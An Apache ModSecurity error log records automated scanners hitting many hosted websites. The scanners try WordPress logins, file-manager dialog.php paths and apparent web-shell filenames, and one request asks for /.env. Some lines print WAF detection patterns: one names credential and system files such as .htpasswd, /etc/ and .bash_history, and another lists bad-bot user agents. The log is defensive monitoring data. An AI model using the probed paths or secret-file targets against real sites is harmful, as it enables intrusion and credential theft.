[Tue May 26 20:01:07.545881 2026] [security2:error] [pid 106517:tid 106629] [remote 5.42.158.148:38632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuq4ZZc2DoU1lPnP1uDwAA220"]
[Tue May 26 20:01:07.559259 2026] [security2:error] [pid 106517:tid 106668] [client 103.163.220.27:60451] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/lock360.php"] [unique_id "ahWuq4ZZc2DoU1lPnP1uFQAAAJc"]
[Tue May 26 20:01:08.042278 2026] [security2:error] [pid 106517:tid 106774] [client 178.238.226.119:59995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/core/filemanager/dialog.php"] [unique_id "ahWurIZZc2DoU1lPnP1uMAAAAQA"]
[Tue May 26 20:01:08.060016 2026] [security2:error] [pid 106517:tid 106759] [client 103.163.220.8:21729] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/imgareaselect/"] [unique_id "ahWurIZZc2DoU1lPnP1uMQAAAPE"]
[Tue May 26 20:01:08.089800 2026] [security2:error] [pid 106517:tid 106748] [client 185.191.171.17:43528] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWurIZZc2DoU1lPnP1uMgAAAOY"]
[Tue May 26 20:01:08.089910 2026] [security2:error] [pid 106517:tid 106748] [client 185.191.171.17:43528] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWurIZZc2DoU1lPnP1uMgAAAOY"]
[Tue May 26 20:01:08.243359 2026] [security2:error] [pid 113091:tid 113100] [remote 51.91.98.45:57310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWurKPxBGSmlFNOy6pA3QACYQg"]
[Tue May 26 20:01:08.564169 2026] [security2:error] [pid 113091:tid 113342] [client 103.163.220.21:30719] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/ocean/"] [unique_id "ahWurKPxBGSmlFNOy6pA4wAAAo0"]
[Tue May 26 20:01:08.576833 2026] [security2:error] [pid 106517:tid 106682] [client 178.238.226.119:52323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/editor/filemanager/dialog.php"] [unique_id "ahWurIZZc2DoU1lPnP1uQAAAAKQ"]
[Tue May 26 20:01:09.015180 2026] [security2:error] [pid 113091:tid 113101] [remote 51.91.98.45:57310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWurKPxBGSmlFNOy6pA5wACiwk"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 20:01:09.053215 2026] [security2:error] [pid 106517:tid 106619] [remote 5.42.158.148:38632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWurIZZc2DoU1lPnP1uTAAAq2M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:01:09.067251 2026] [security2:error] [pid 113091:tid 113246] [client 103.163.220.21:20783] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/chosen.php"] [unique_id "ahWuraPxBGSmlFNOy6pA7AAAAi0"]
[Tue May 26 20:01:09.099101 2026] [security2:error] [pid 106517:tid 106652] [client 43.173.177.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWurYZZc2DoU1lPnP1uTQAAAIc"]
[Tue May 26 20:01:09.163467 2026] [security2:error] [pid 106517:tid 106719] [client 178.238.226.119:61060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/scripts/ckeditor/filemanager/dialog.php"] [unique_id "ahWurYZZc2DoU1lPnP1uVQAAAMk"]
[Tue May 26 20:01:09.192836 2026] [security2:error] [pid 106517:tid 106708] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWurIZZc2DoU1lPnP1uRgAAAL4"]
[Tue May 26 20:01:09.587327 2026] [security2:error] [pid 113091:tid 113223] [client 103.163.220.20:38313] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/widgets/"] [unique_id "ahWuraPxBGSmlFNOy6pA-QAAAhY"]
[Tue May 26 20:01:09.596134 2026] [security2:error] [pid 106517:tid 106595] [remote 69.12.58.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWuqoZZc2DoU1lPnP1t4wAA30s"], referer: https://kingsclub.in/indoor-swimming-pool/
[Tue May 26 20:01:09.670050 2026] [security2:error] [pid 106517:tid 106731] [client 176.65.139.237:59318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "alpha-bau.net"] [uri "/.env"] [unique_id "ahWurYZZc2DoU1lPnP1ucwAAANU"]
[Tue May 26 20:01:09.833249 2026] [security2:error] [pid 106517:tid 106778] [client 178.238.226.119:56287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/scripts/filemanager/dialog.php"] [unique_id "ahWurYZZc2DoU1lPnP1udwAAAQQ"]
[Tue May 26 20:01:10.309538 2026] [security2:error] [pid 106517:tid 106743] [client 178.238.226.119:60658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/javascript/filemanager/dialog.php"] [unique_id "ahWuroZZc2DoU1lPnP1uhwAAAOE"]
[Tue May 26 20:01:10.520207 2026] [security2:error] [pid 113091:tid 113282] [client 103.163.220.15:56187] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/widgets/admin.php"] [unique_id "ahWurqPxBGSmlFNOy6pBBgAAAlE"]
[Tue May 26 20:01:10.523430 2026] [autoindex:error] [pid 112029:tid 112177] [client 162.243.41.33:58837] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:01:10.632355 2026] [autoindex:error] [pid 112029:tid 112197] [client 162.243.41.33:58837] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:01:10.765673 2026] [security2:error] [pid 112029:tid 112206] [client 162.243.41.33:58837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWurqFW0C-ajaCsyFc-iAAAATk"]
[Tue May 26 20:01:10.855349 2026] [security2:error] [pid 113091:tid 113315] [client 178.238.226.119:63121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/global/plugins/filemanager/dialog.php"] [unique_id "ahWurqPxBGSmlFNOy6pBCwAAAnI"]
[Tue May 26 20:01:11.281157 2026] [security2:error] [pid 106517:tid 106749] [client 103.163.220.7:42235] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfour/"] [unique_id "ahWur4ZZc2DoU1lPnP1upwAAAOc"]
[Tue May 26 20:01:11.448391 2026] [security2:error] [pid 106517:tid 106712] [client 178.238.226.119:59337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/global/filemanager/dialog.php"] [unique_id "ahWur4ZZc2DoU1lPnP1uswAAAMI"]
[Tue May 26 20:01:11.766181 2026] [security2:error] [pid 106517:tid 106744] [client 103.163.220.22:49647] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/"] [unique_id "ahWur4ZZc2DoU1lPnP1uvgAAAOI"]
[Tue May 26 20:01:11.768593 2026] [security2:error] [pid 113091:tid 113310] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWur6PxBGSmlFNOy6pBDwAAAm0"]
[Tue May 26 20:01:12.046555 2026] [security2:error] [pid 113091:tid 113343] [client 178.238.226.119:63927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/plugins/filemanager/dialog.php"] [unique_id "ahWusKPxBGSmlFNOy6pBFgAAAo4"]
[Tue May 26 20:01:12.263382 2026] [security2:error] [pid 106517:tid 106732] [client 103.163.220.23:44883] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/customize-widgets/"] [unique_id "ahWusIZZc2DoU1lPnP1u1QAAANY"]
[Tue May 26 20:01:12.773392 2026] [security2:error] [pid 106517:tid 106670] [client 178.238.226.119:65432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/plugins/js/filemanager/dialog.php"] [unique_id "ahWusIZZc2DoU1lPnP1u6AAAAJk"]
[Tue May 26 20:01:12.775480 2026] [security2:error] [pid 113091:tid 113232] [client 103.163.220.52:31327] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/admin.php"] [unique_id "ahWusKPxBGSmlFNOy6pBHwAAAh8"]
[Tue May 26 20:01:13.227648 2026] [security2:error] [pid 113091:tid 113112] [remote 5.42.158.148:54470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWusaPxBGSmlFNOy6pBJAACQBQ"]
[Tue May 26 20:01:13.261800 2026] [security2:error] [pid 106517:tid 106655] [client 103.163.220.32:35845] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/certificates/"] [unique_id "ahWusYZZc2DoU1lPnP1u-wAAAIo"]
[Tue May 26 20:01:13.336236 2026] [security2:error] [pid 106517:tid 106746] [client 178.238.226.119:61580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/plugins/ckeditor/filemanager/dialog.php"] [unique_id "ahWusYZZc2DoU1lPnP1vAgAAAOQ"]
[Tue May 26 20:01:13.459294 2026] [security2:error] [pid 113091:tid 113313] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWusaPxBGSmlFNOy6pBIgAAAnA"]
[Tue May 26 20:01:13.766774 2026] [security2:error] [pid 113091:tid 113269] [client 103.163.220.9:41723] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/midnight/"] [unique_id "ahWusaPxBGSmlFNOy6pBLQAAAkQ"]
[Tue May 26 20:01:13.822817 2026] [security2:error] [pid 113091:tid 113116] [remote 194.213.4.139:34514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWusaPxBGSmlFNOy6pBLAACJRg"]
[Tue May 26 20:01:13.944759 2026] [security2:error] [pid 106517:tid 106728] [client 178.238.226.119:49902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/plugins/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWusYZZc2DoU1lPnP1vGQAAANI"]
[Tue May 26 20:01:14.262768 2026] [security2:error] [pid 106517:tid 106749] [client 103.163.220.17:62053] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/css.php"] [unique_id "ahWusoZZc2DoU1lPnP1vIgAAAOc"]
[Tue May 26 20:01:14.334298 2026] [security2:error] [pid 113091:tid 113205] [remote 194.213.4.139:34514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWusqPxBGSmlFNOy6pBMAACQ3E"], referer: https://kingsclubmembership.com/wp-login.php
[Tue May 26 20:01:14.441283 2026] [security2:error] [pid 112029:tid 112271] [client 178.238.226.119:50714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/js/filemanager/dialog.php"] [unique_id "ahWusqFW0C-ajaCsyFc-mAAAAXo"]
[Tue May 26 20:01:14.765851 2026] [security2:error] [pid 106517:tid 106662] [client 103.163.220.52:26647] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/assets/fonts/"] [unique_id "ahWusoZZc2DoU1lPnP1vPAAAAJE"]
[Tue May 26 20:01:14.824836 2026] [security2:error] [pid 106517:tid 106755] [client 104.28.122.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWusoZZc2DoU1lPnP1vNgAAAO0"]
[Tue May 26 20:01:15.025648 2026] [security2:error] [pid 112029:tid 112232] [client 178.238.226.119:51763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/js/plugins/filemanager/dialog.php"] [unique_id "ahWus6FW0C-ajaCsyFc-nwAAAVM"]
[Tue May 26 20:01:15.268991 2026] [security2:error] [pid 106517:tid 106702] [client 103.163.220.34:24707] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/footnotes/"] [unique_id "ahWus4ZZc2DoU1lPnP1vWAAAALg"]
[Tue May 26 20:01:15.686263 2026] [security2:error] [pid 112029:tid 112246] [client 178.238.226.119:50480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/js/ckeditor/filemanager/dialog.php"] [unique_id "ahWus6FW0C-ajaCsyFc-qAAAAWE"]
[Tue May 26 20:01:15.772484 2026] [security2:error] [pid 113091:tid 113277] [client 103.163.220.37:33713] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/neve/assets/apps/dashboard/build/"] [unique_id "ahWus6PxBGSmlFNOy6pBNgAAAkw"]
[Tue May 26 20:01:16.242848 2026] [security2:error] [pid 113091:tid 113299] [client 178.238.226.119:52436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/tinymce/plugins/filemanager//dialog.php"] [unique_id "ahWutKPxBGSmlFNOy6pBPgAAAmI"]
[Tue May 26 20:01:16.283865 2026] [security2:error] [pid 113091:tid 113317] [client 103.163.220.54:37145] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ws.php"] [unique_id "ahWutKPxBGSmlFNOy6pBPwAAAnQ"]
[Tue May 26 20:01:16.520487 2026] [security2:error] [pid 112029:tid 112049] [remote 173.212.233.81:48394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWutKFW0C-ajaCsyFc-rAABGRM"]
[Tue May 26 20:01:16.776135 2026] [security2:error] [pid 113091:tid 113295] [client 103.163.220.39:22715] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/wp.php"] [unique_id "ahWutKPxBGSmlFNOy6pBQwAAAl4"]
[Tue May 26 20:01:16.795641 2026] [security2:error] [pid 106517:tid 106759] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWutIZZc2DoU1lPnP1vgAAAAPE"]
[Tue May 26 20:01:16.831846 2026] [security2:error] [pid 106517:tid 106727] [client 178.238.226.119:53525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/filemanager/dialog.php"] [unique_id "ahWutIZZc2DoU1lPnP1vkwAAANE"]
[Tue May 26 20:01:17.032928 2026] [security2:error] [pid 112029:tid 112052] [remote 173.212.233.81:48394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWutKFW0C-ajaCsyFc-sAABThY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:01:17.265382 2026] [security2:error] [pid 112029:tid 112202] [client 103.163.220.39:45607] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/"] [unique_id "ahWutaFW0C-ajaCsyFc-sgAAATU"]
[Tue May 26 20:01:17.347787 2026] [security2:error] [pid 106517:tid 106680] [client 178.238.226.119:49739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWutYZZc2DoU1lPnP1vqAAAAKI"]
[Tue May 26 20:01:17.771202 2026] [security2:error] [pid 113091:tid 113255] [client 103.163.220.12:21465] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/maint/includes/"] [unique_id "ahWutaPxBGSmlFNOy6pBWgAAAjY"]
[Tue May 26 20:01:17.936113 2026] [security2:error] [pid 112029:tid 112233] [client 178.238.226.119:53995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/filemanager/dialog.php"] [unique_id "ahWutaFW0C-ajaCsyFc-tgAAAVQ"]
